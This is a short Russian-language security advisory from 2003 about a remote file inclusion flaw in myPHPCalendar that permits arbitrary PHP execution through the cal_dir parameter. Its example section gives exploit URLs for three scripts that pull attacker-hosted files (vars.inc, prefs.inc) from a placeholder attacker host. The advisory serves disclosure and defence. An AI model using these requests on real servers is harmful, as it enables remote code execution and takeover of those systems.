Security Lab

Выполнение произвольного PHP кода в myPHPCalendar

Дата публикации:15.10.2003
Всего просмотров:4400
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: myPHPCalendar 10192000 Build 1 Beta

Описание: Уязвимость обнаружена в myPHPCalendar. Удаленный атакующий может выполнить произвольный PHP код, включая команды операционной системы, на целевой системе.

Сценарии 'admin.php', 'contacts.php', и 'convert-date.php' включают файлы из $cal_dir каталога. Удаленный пользователь может определить удаленное местоположение для $cal_dir каталога, чтобы включить и выполнить произвольный PHP сценарий на целевом сервере.

Пример/Эксплоит:

http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php? cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/
, где

http://[attacker]/vars.inc
http://[attacker]/prefs.inc

URL производителя: http://myphpcalendar.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно скачать отюда: http://www.phpsecure.info/

Ссылки: myPHPCalendar